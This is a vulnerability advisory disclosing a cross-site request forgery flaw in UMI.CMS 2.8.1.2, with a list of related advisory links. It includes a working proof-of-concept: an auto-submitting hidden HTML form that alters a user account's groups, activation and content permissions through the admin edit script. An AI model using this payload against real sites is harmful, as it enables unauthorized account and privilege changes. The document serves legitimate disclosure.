HTB22812: XSRF (CSRF) in UMI.CMS



Vulnerability ID: HTB22812
Reference: http://www.htbridge.ch/advisory/xsrf_csrf_in_umi_cms.html
Product: UMI.CMS
Vendor: umisoft ( http://www.umi-cms.ru/ )
Vulnerable Version: 2.8.1.2
Vendor Notification: 25 January 2011
Vulnerability Type: CSRF (Cross-Site Request Forgery)
Risk level: Low
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)

Vulnerability Details:
The vulnerability exists due to failure in the "/admin/users/edit/USERID/do/" script to properly verify the source of HTTP request.

Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.

Attacker can use browser to exploit this vulnerability. The following PoC is available:

<form action="http://[host]/admin/users/edit/USERID/do/"; method="post" name="main" enctype="multipart/form-data" >

<input type="hidden" name="referer" value="google">
<input type="hidden" name="domain" value="[host]">
<input type="hidden" name="type-id" value="4">
<input type="hidden" name="data[USERID][login]" value="test">
<input type="hidden" name="data[USERID][password][]" value="">
<input type="hidden" name="data[USERID][e-mail]" value="email@xxxxxxxxxxx">
<input type="hidden" name="data[USERID][groups][]" value="0">
<input type="hidden" name="data[USERID][groups][]" value="2374">
<input type="hidden" name="data[USERID][groups][]" value="0">
<input type="hidden" name="data[USERID][is_activated]" value="0">
<input type="hidden" name="data[USERID][is_activated]" value="1">
<input type="hidden" name="data[USERID][preffered_currency]" value="">
<input type="hidden" name="data[USERID][lname]" value="">
<input type="hidden" name="data[USERID][fname]" value="">
<input type="hidden" name="data[USERID][father_name]" value="">
<input type="hidden" name="ps_m_perms[content]" value="content">
<input type="hidden" name="domain[1]" value="0">
<input type="hidden" name="domain[1]" value="1">
<input type="hidden" name="content[content]" value="1">
<input type="hidden" name="content[sitetree]" value="1">
<input type="hidden" name="save-mode" value="Save">

</form>
<script>
document.main.submit();
</script>



Relevant Pages

  • Jupiter CMS 1.1.5 Multiple Vulnerabilities
    ... against SQL Injection attacks) in several SQL request. ... is that the script do not check for file extensions when a user upload ... Risk level: Medium ... simple poc illustrate how an attacker can exploit this vulnerability: ...
    (Bugtraq)
  • Re: Vulnebrability level definition
    ... vulnerability can get varying risk levels across different ... If you're referring to the weekly "SANS Critical Vulnerability ... exploitation in widespread software with root/admin level privileges. ... I've tried tackling the risk level problem. ...
    (Security-Basics)
  • Re: Vulnebrability level definition
    ... vulnerability can get varying risk levels across different ... If you're referring to the weekly "SANS Critical Vulnerability ... I've tried tackling the risk level problem. ... This list is provided by the SecurityFocus Security Intelligence Alert ...
    (Pen-Test)
  • HTB22862: Path disclosure in NextGEN Gallery wordpress plugin
    ... Vulnerability ID: HTB22862 ... Vulnerability Type: Path disclosure ... Risk level: Low ... Vulnerability Details: ...
    (Bugtraq)
  • HTB22927: CSRF (Cross-Site Request Forgery) in Webjaxe
    ... Vulnerability Type: CSRF ... Risk level: Low ... Vulnerability Details: ... Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data. ...
    (Bugtraq)